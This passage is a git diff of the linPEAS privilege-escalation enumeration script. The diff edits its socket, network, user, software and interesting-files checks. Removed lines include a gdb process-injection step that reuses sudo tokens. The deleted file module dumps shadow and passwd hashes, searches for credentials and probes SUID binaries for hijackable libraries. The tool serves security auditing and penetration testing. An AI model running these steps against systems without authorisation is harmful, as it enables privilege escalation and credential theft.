"$IAMROOT" ]; then if ! [ "$unix_scks_list" ];then unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) fi + unix_scks_list3=$(lsof -U 2>/dev/null | awk '{print $9}' | grep "/") fi if ! [ "$SEARCH_IN_FOLDER" ]; then @@ -259,7 +298,7 @@ if ! [ "$IAMROOT" ]; then fi # Detele repeated dockets and check permissions - (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do + (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2" && printf "%s\n" "$unix_scks_list3") | sort | uniq | while read l; do perms="" if [ -r "$l" ]; then perms="Read " diff --git a/linPEAS/builder/linpeas_parts/5_network_information.sh b/linPEAS/builder/linpeas_parts/5_network_information.sh index 402b579..d385ed0 100644 --- a/linPEAS/builder/linpeas_parts/5_network_information.sh +++ b/linPEAS/builder/linpeas_parts/5_network_information.sh @@ -24,7 +24,7 @@ fi #-- NI) Interfaces print_2title "Interfaces" cat /etc/networks 2>/dev/null -(ifconfig || ip a) 2>/dev/null +(ifconfig || ip a || (cat /proc/net/dev; cat /proc/net/fib_trie; cat /proc/net/fib_trie6)) 2>/dev/null echo "" #-- NI) Neighbours @@ -54,7 +54,7 @@ fi #-- NI) Ports print_2title "Active Ports" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports" -( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," +( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g" echo "" #-- NI) MacOS hardware ports diff --git a/linPEAS/builder/linpeas_parts/6_users_information.sh b/linPEAS/builder/linpeas_parts/6_users_information.sh index ed7127f..5fedb16 100644 --- a/linPEAS/builder/linpeas_parts/6_users_information.sh +++ b/linPEAS/builder/linpeas_parts/6_users_information.sh @@ -80,32 +80,34 @@ echo "" print_2title "Checking sudo tokens" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens" ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" -if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; -else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; -fi -is_gdb="$(command -v gdb 2>/dev/null)" -if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; -else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; -fi -if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then - echo "Checking for sudo tokens in other shells owned by current user" - for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do - echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) - echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 - if [ -f "/tmp/shrndom32r2r" ]; then - echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - break - fi - done - if [ -f "/tmp/shrndom32r2r" ]; then - rm -f /tmp/shrndom32r2r 2>/dev/null - else echo "The escalation didn't work... (try again later?)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then + echo "ptrace protection is disabled (0), so sudo tokens could be abused" | sed "s,is disabled,${SED_RED},g"; + + if [ "$(command -v gdb 2>/dev/null)" ]; then + echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; fi + + if [ "$CURRENT_USER_PIVOT_PID" ]; then + echo "The current user proc $CURRENT_USER_PIVOT_PID is the parent of a different user proccess" | sed -${E} "s,.*,${SED_RED},g"; + fi + + if [ -f "$HOME/.sudo_as_admin_successful" ]; then + echo "Current user has .sudo_as_admin_successful file, so he can execute with sudo" | sed -${E} "s,.*,${SED_RED},"; + fi + + if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then + echo "Current user has other interactive shells running" | sed -${E} "s,.*,${SED_RED},g"; + ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' + fi + +else + echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; + fi echo "" #-- UI) Doas -if [ "$(command -v doas 2>/dev/null)" ] || [ "$DEBUG" ]; then +if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then print_2title "Checking doas.conf" doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then diff --git a/linPEAS/builder/linpeas_parts/7_software_information.sh b/linPEAS/builder/linpeas_parts/7_software_information.sh index 6a1c712..7e04b15 100644 --- a/linPEAS/builder/linpeas_parts/7_software_information.sh +++ b/linPEAS/builder/linpeas_parts/7_software_information.sh @@ -129,9 +129,9 @@ if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then done fi - mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") + mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep -Ev '^lib_mysqludf_sys.so:$' | grep "lib_mysqludf_sys\.so") if [ "$mysqlexec" ]; then - echo "Found $mysqlexec" + echo "Found $mysqlexec. $(whereis lib_mysqludf_sys.so)" echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," fi done @@ -325,16 +325,20 @@ peass{NFS Exports} #-- SI) Kerberos kadmin_exists="$(command -v kadmin)" klist_exists="$(command -v klist)" -if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then +kinit_exists="$(command -v kinit)" +if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then print_2title "Searching kerberos conf files and tickets" print_info "http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory" if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi + if [ "$kinit_exists" ]; then echo "kadmin was found on $kinit_exists" | sed "s,$kinit_exists,${SED_RED},"; fi if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; fi + + (env || printenv) 2>/dev/null | grep -E "^KRB5" | sed -${E} "s,KRB5,${SED_RED},g" printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do if [ -r "$f" ]; then @@ -376,6 +380,8 @@ if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ fi +peass{FreeIPA} + peass{Knockd} peass{Kibana} @@ -505,7 +511,7 @@ SPLUNK_BIN="$(command -v splunk 2>/dev/null)" if [ "$PSTORAGE_SPLUNK" ] || [ "$SPLUNK_BIN" ] || [ "$DEBUG" ]; then print_2title "Searching uncommon passwd files (splunk)" if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi - printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do + printf "%s\n" "$PSTORAGE_SPLUNK" | grep -v ".htpasswd" | sort | uniq | while read f; do if [ -f "$f" ] && ! [ -x "$f" ]; then echo "passwd file: $f" | sed "s,$f,${SED_RED}," cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," diff --git a/linPEAS/builder/linpeas_parts/8_interesting_files.sh b/linPEAS/builder/linpeas_parts/8_interesting_files.sh deleted file mode 100644 index d3c932e..0000000 --- a/linPEAS/builder/linpeas_parts/8_interesting_files.sh +++ /dev/null @@ -1,723 +0,0 @@ -########################################### -#----------) Interesting files (----------# -########################################### - -check_critial_root_path(){ - folder_path="$1" - if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if [ "$(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if [ "$(find $folder_path -type f -not -user root 2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find $folder_path -type f -not -user root 2>/dev/null)"; fi -} - - - - -##-- IF) SUID -print_2title "SUID - Check easy privesc, exploits and write perms" -print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid" -if ! [ "$STRINGS" ]; then - echo_not_found "strings" -fi -if ! [ "$STRACE" ]; then - echo_not_found "strace" -fi -suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) -for s in $suids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total"; then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo $s | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SUID binary!)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do - sline_first="$(echo "$sline" | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then - printf $ITALIC - echo "----------------------------------------------------------------------------------------" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH - export LD_LIBRARY_PATH="" - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf $NC - export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH - echo "----------------------------------------------------------------------------------------" - echo "" - fi - fi - fi - fi - fi -done; -echo "" - - -##-- IF) SGID -print_2title "SGID" -print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid" -sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) -for s in $sgids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total";then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" | sort | uniq | while read sline; do - sline_first="$(echo $sline | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then - printf "$ITALIC" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf "$NC" - echo "" - fi - fi - fi - fi - fi -done; -echo "" - -##-- IF) Misconfigured ld.so -if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then - print_2title "Checking misconfigurations of ld.so" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so" - printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat /etc/ld.so.conf 2>/dev/null | while read l; do - if echo "$l" | grep -q include; then - ini_path=$(echo "$l" | cut -d " " -f 2) - fpath=$(dirname "$ini_path") - if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - done - fi - done - echo "" -fi - -##-- IF) Capabilities -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Capabilities" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities" - if [ "$(command -v capsh)" ]; then - echo "Current env capabilities:" - (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" - echo "Current proc capabilities:" - (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" - echo "" - echo "Parent Shell capabilities:" - (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" - else - echo "Current capabilities:" - cat /proc/self/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|0000003fffffffff,${SED_GREEN},g" - echo "" - echo "Shell capabilities:" - cat /proc/$PPID/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|0000003fffffffff,${SED_GREEN},g" - fi - echo "" - echo "Files with capabilities (limited to 50):" - getcap -r / 2>/dev/null | head -n 50 | while read cb; do - capsVB_vuln="" - - for capVB in $capsVB; do - capname="$(echo $capVB | cut -d ':' -f 1)" - capbins="$(echo $capVB | cut -d ':' -f 2)" - if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then - echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," - capsVB_vuln="1" - break - fi - done - - if ! [ "$capsVB_vuln" ]; then - echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," - fi - - if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then - echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," - fi - done - echo "" -fi - -##-- IF) Users with capabilities -if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then - print_2title "Users with capabilities" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities" - if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - else echo_not_found "/etc/security/capability.conf" - fi - echo "" -fi - -##-- IF) AppArmor profiles to prevent suid/capabilities abuse -if ! [ "$SEARCH_IN_FOLDER" ]; then - if [ -d "/etc/apparmor.d/" ] && [ -r "/etc/apparmor.d/" ]; then - print_2title "AppArmor binary profiles" - ls -l /etc/apparmor.d/ 2>/dev/null | grep -E "^-" | grep "\." - echo "" - fi -fi - -##-- IF) Files with ACLs -print_2title "Files with ACLs (limited to 50)" -print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls" -if ! [ "$SEARCH_IN_FOLDER" ]; then - ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," -else - ( (getfacl -t -s -R -p $SEARCH_IN_FOLDER 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," -fi - -if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) - ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," -fi -echo "" - -##-- IF) Files with ResourceFork -#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER -# print_2title "Files with ResourceFork" -# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" -# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" -#fi -#echo "" - -##-- IF) .sh files in PATH -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title ".sh files in path" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path" - echo $PATH | tr ":" "\n" | while read d; do - for f in $(find "$d" -name "*.sh" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -O "$f" ]; then - echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) - echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; - fi - done - done - echo "" - - broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken) - if [ "$broken_links" ] || [ "$DEBUG" ]; then - print_2title "Broken links in path" - echo $PATH | tr ":" "\n" | while read d; do - find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; - done - echo "" - fi -fi - -##-- IF) Date times inside firmware -if [ "$SEARCH_IN_FOLDER" ]; then - print_2title "FIles datetimes inside the firmware (limit 50)" - find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n" 2>/dev/null | sort | uniq -c | sort | head -n 50 - echo "To find a file with an specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\" 2>/dev/null | grep \"\"" - echo "" -fi - -##-- IF) Executable files added by user -print_2title "Executable files potentially added by user (limit 70)" -if ! [ "$SEARCH_IN_FOLDER" ]; then - find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70 -else - find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70 -fi -echo "" - - - -if [ "$MACPEAS" ]; then - print_2title "Unsigned Applications" - macosNotSigned /System/Applications -fi - -##-- IF) Unexpected in /opt -if ! [ "$SEARCH_IN_FOLDER" ]; then - if [ "$(ls /opt 2>/dev/null)" ]; then - print_2title "Unexpected in /opt (usually empty)" - ls -la /opt - echo "" - fi -fi - -##-- IF) Unexpected folders in / -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Unexpected in root" - if [ "$MACPEAS" ]; then - (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - else - (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - fi - echo "" -fi - -##-- IF) Files (scripts) in /etc/profile.d/ -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Files (scripts) in /etc/profile.d/" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files" - if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" - check_critial_root_path "/etc/profile" - check_critial_root_path "/etc/profile.d/" - fi - echo "" -fi - - ##-- IF) Files (scripts) in /etc/init.d/ - if ! [ "$SEARCH_IN_FOLDER" ]; then -print_2title "Permissions in init, init.d, systemd, and rc.d" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d" - if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS - check_critial_root_path "/etc/init/" - check_critial_root_path "/etc/init.d/" - check_critial_root_path "/etc/rc.d/init.d" - check_critial_root_path "/usr/local/etc/rc.d" - check_critial_root_path "/etc/rc.d" - check_critial_root_path "/etc/systemd/" - check_critial_root_path "/lib/systemd/" - fi - - echo "" -fi - -##-- IF) Hashes in passwd file -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_list "Hashes inside passwd file? ........... " - if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Writable in passwd file - print_list "Writable passwd file? ................ " - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Credentials in fstab - print_list "Credentials in fstab/mtab? ........... " - if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Read shadow files - print_list "Can I read shadow files? ............. " - if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "Can I read shadow plists? ............ " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - print_list "Can I write shadow plists? ........... " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - ##-- IF) Read opasswd file - print_list "Can I read opasswd file? ............. " - if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" - else echo_no - fi - - ##-- IF) network-scripts - print_list "Can I write in network-scripts? ...... " - if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 